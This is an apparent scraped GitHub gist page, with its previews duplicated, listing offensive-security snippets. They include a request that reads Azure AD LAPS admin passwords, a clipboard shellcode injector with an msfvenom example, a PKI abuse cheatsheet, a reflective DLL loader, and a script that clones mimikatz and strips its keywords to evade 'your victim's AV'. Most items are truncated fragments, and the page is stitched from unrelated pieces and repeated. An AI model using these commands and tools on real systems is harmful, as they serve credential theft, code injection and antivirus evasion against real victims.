johnjohnsp1

## AADLAPS_Request.txt
GET /beta/deviceLocalCredentials/[DEVICE-ID]?$select=credentials HTTP/1.1
ocp-client-version: 1.0
client-request-id: 96cbfa59-dbfc-4a92-b261-7f77bd8f4b9b
ocp-client-name: Get-LapsAADPassword Windows LAPS Cmdlet
User-Agent: Mozilla/5.0 (Windows NT 10.0; Microsoft Windows 10.0.22621; en-US) PowerShell/5.1.22621.963 Invoke-MgGraphRequest
SdkVersion: graph-powershell/1.26.0, Graph-dotnet-1.25.1
FeatureFlag: 00000047
Cache-Control: no-store, no-cache
Authorization: Bearer [AAD-JWT-HERE]
Accept-Encoding: gzip

## PowerShellLab_Setup.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                johnjohnsp1
                / PowerShellLab_Setup.md
            
            
              Created
              December 12, 2021 10:07
                — forked from jdhitsolutions/PowerShellLab_Setup.md
            
              
                Detailed instructions for setting up the PowerShellLab for my Pluralsight courses.
              
          
    PowerShell Lab Detailed Setup Instructions

For my Pluralsight PowerShell courses, you are welcome to use any lab environment you wish. It should include an Active Directory domain with at least a domain controller, a Windows 10 client, and a Windows Server 2016 or 2019 member server. You will need to modify the course files to fit your environment. At this point in time, Windows Server 2022 remains untested for my labs.
However, I am going to recommend that you use a free PowerShell module called PSAutoLab. I encourag you to look at the README document on the project's Github repository before proceeding. If you need help with the module or its commands, you will use the repository's Issue section.
PSAutolab

Please refer to this document to assist in installing and setting up the PSAutolab module on your computer. Run all commands from an elevated Windows PowerShell

  
## ClippyShellcodeInject.cs
// Using the clipboard as your code cave.
// Generate your shellcode with msfvenom or whatever
// Example: msfvenom -p windows/x64/exec CMD=calc exitfunc=thread -f raw -o <outputfile.bin>
// Compile: C:\windows\Microsoft.NET\Framework64\v3.5\csc.exe C:\Path\To\ClippyShellcodeInject.cs

using System;
using System.IO;
using System.Runtime.InteropServices;

namespace ClippySCInject

## MDE_DataCollection_Scripts.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                johnjohnsp1
                / MDE_DataCollection_Scripts.md
            
            
              Created
              October 28, 2021 10:26
                — forked from mattifestation/MDE_DataCollection_Scripts.md
            
          
    Microsoft Defender for Endpoint does a great job of ensuring the integrity of the scripts they push and execute.
First, they ensure that the script to execute matches the expected file hash. Example:
powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command "& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7910.6064030.0.6552433-3a7d9fb541a03fc183f740777b7bb1aa20a20efd\046a3caf-d9ec-4da6-a32a-fb148992596a.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7910.6064030.0.6552433-3a7d9fb541a03fc183f740777b7bb1aa20a20efd\046a3caf-d9ec-4da6-a32a-fb148992596a.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq 'd871ab44a81b93cdf3c7e235c246ea8b4bf65d9141d7797270c15dd6bbdb2803'))


## PKI_Abuse_cheatsheet.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                johnjohnsp1
                / PKI_Abuse_cheatsheet.md
            
            
              Created
              September 20, 2021 14:10
                — forked from Flangvik/PKI_Abuse_cheatsheet.md
            
              
                PKI Abuse CheatSheet
              
          
    PKI Abuse

Some golden links when you are having issues:
https://social.technet.microsoft.com/Forums/windows/en-US/96016a13-9062-4842-b534-203d2f400cae/ca-certificate-request-error-quotdenied-by-policy-module-0x80094800quot-windows-server-2008?forum=winserversecurity
Enumerating ADCS On Linux

Download and install Certi


## ISeeSharpProcess.cs
using System;
using System.Diagnostics;

namespace ISeeSharpProcess
{
    class Program
    {
        // Port of https://gist.github.com/mubix/1536156f06633a54e7f1f819d7fa740a
        static void GetCSharpProcess()
        {

## pdf-grep
#!/bin/bash

# Three arguments: ROOT_DIR, PATTERN, OPTIONS
# Search below $ROOT_DIR for PDF files matching $PATTERN
# $OPTIONS is passed to pdfgrep (ex: grep-pdf . 'some words' -h -C5)

# ROOT_DIR

if [ -z "$1" ]; then
    echo "! Argument ROOT_DIR is needed!"

## PsexecReflective.ps1
function reflectit
{
<#
.SYNOPSIS

This script has two modes. It can reflectively load a DLL/EXE in to the PowerShell process,
or it can reflectively load a DLL in to a remote process. These modes have different parameters and constraints,
please lead the Notes section (GENERAL NOTES) for information on how to use them.

1.)Reflectively loads a DLL or EXE in to memory of the Powershell process.

## mimikatz_obfuscator.sh
# This script downloads and slightly "obfuscates" the mimikatz project.
# Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "benjamin@gentilkiwi.com" ...,
# so removing them from the project before compiling gets us past most of the AV solutions.
# We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ....,
# but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program.

git clone https://github.com/gentilkiwi/mimikatz.git windows
mv windows/mimikatz windows/windows
find windows/ -type f -print0 | xargs -0 sed -i 's/mimikatz/windows/g'
find windows/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/WINDOWS/g'

## Invoke-UpdateMimikatzScript.ps1

 <#
    .Synopsis
        Invoke-UpdateMimikatzScript created by Hashim Jawad (@ihack4falafel)
    .DESCRIPTION
       Convert x64/x86 powerkatz.dll to Base64 string and then update Invoke-Mimikatz.ps1 script from Empire, see the link https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1
    .PARAMETER DllPath
       Path to powerkatz.dll generated via Visual Studio.
    .PARAMETER ScriptPath
       Path to Invoke-Mimikatz.ps1 script.
	GET /beta/deviceLocalCredentials/[DEVICE-ID]?$select=credentials HTTP/1.1
	ocp-client-version: 1.0
	client-request-id: 96cbfa59-dbfc-4a92-b261-7f77bd8f4b9b
	ocp-client-name: Get-LapsAADPassword Windows LAPS Cmdlet
	User-Agent: Mozilla/5.0 (Windows NT 10.0; Microsoft Windows 10.0.22621; en-US) PowerShell/5.1.22621.963 Invoke-MgGraphRequest
	SdkVersion: graph-powershell/1.26.0, Graph-dotnet-1.25.1
	FeatureFlag: 00000047
	Cache-Control: no-store, no-cache
	Authorization: Bearer [AAD-JWT-HERE]
	Accept-Encoding: gzip
	// Using the clipboard as your code cave.
	// Generate your shellcode with msfvenom or whatever
	// Example: msfvenom -p windows/x64/exec CMD=calc exitfunc=thread -f raw -o <outputfile.bin>
	// Compile: C:\windows\Microsoft.NET\Framework64\v3.5\csc.exe C:\Path\To\ClippyShellcodeInject.cs

	using System;
	using System.IO;
	using System.Runtime.InteropServices;

	namespace ClippySCInject
	using System;
	using System.Diagnostics;

	namespace ISeeSharpProcess
	{
	class Program
	{
	// Port of https://gist.github.com/mubix/1536156f06633a54e7f1f819d7fa740a
	static void GetCSharpProcess()
	{
	#!/bin/bash

	# Three arguments: ROOT_DIR, PATTERN, OPTIONS
	# Search below $ROOT_DIR for PDF files matching $PATTERN
	# $OPTIONS is passed to pdfgrep (ex: grep-pdf . 'some words' -h -C5)

	# ROOT_DIR

	if [ -z "$1" ]; then
	echo "! Argument ROOT_DIR is needed!"
	function reflectit
	{
	<#
	.SYNOPSIS

	This script has two modes. It can reflectively load a DLL/EXE in to the PowerShell process,
	or it can reflectively load a DLL in to a remote process. These modes have different parameters and constraints,
	please lead the Notes section (GENERAL NOTES) for information on how to use them.

	1.)Reflectively loads a DLL or EXE in to memory of the Powershell process.
	# This script downloads and slightly "obfuscates" the mimikatz project.
	# Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "benjamin@gentilkiwi.com" ...,
	# so removing them from the project before compiling gets us past most of the AV solutions.
	# We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ....,
	# but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program.

	git clone https://github.com/gentilkiwi/mimikatz.git windows
	mv windows/mimikatz windows/windows
	find windows/ -type f -print0 \| xargs -0 sed -i 's/mimikatz/windows/g'
	find windows/ -type f -print0 \| xargs -0 sed -i 's/MIMIKATZ/WINDOWS/g'

	<#
	.Synopsis
	Invoke-UpdateMimikatzScript created by Hashim Jawad (@ihack4falafel)
	.DESCRIPTION
	Convert x64/x86 powerkatz.dll to Base64 string and then update Invoke-Mimikatz.ps1 script from Empire, see the link https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1
	.PARAMETER DllPath
	Path to powerkatz.dll generated via Visual Studio.
	.PARAMETER ScriptPath
	Path to Invoke-Mimikatz.ps1 script.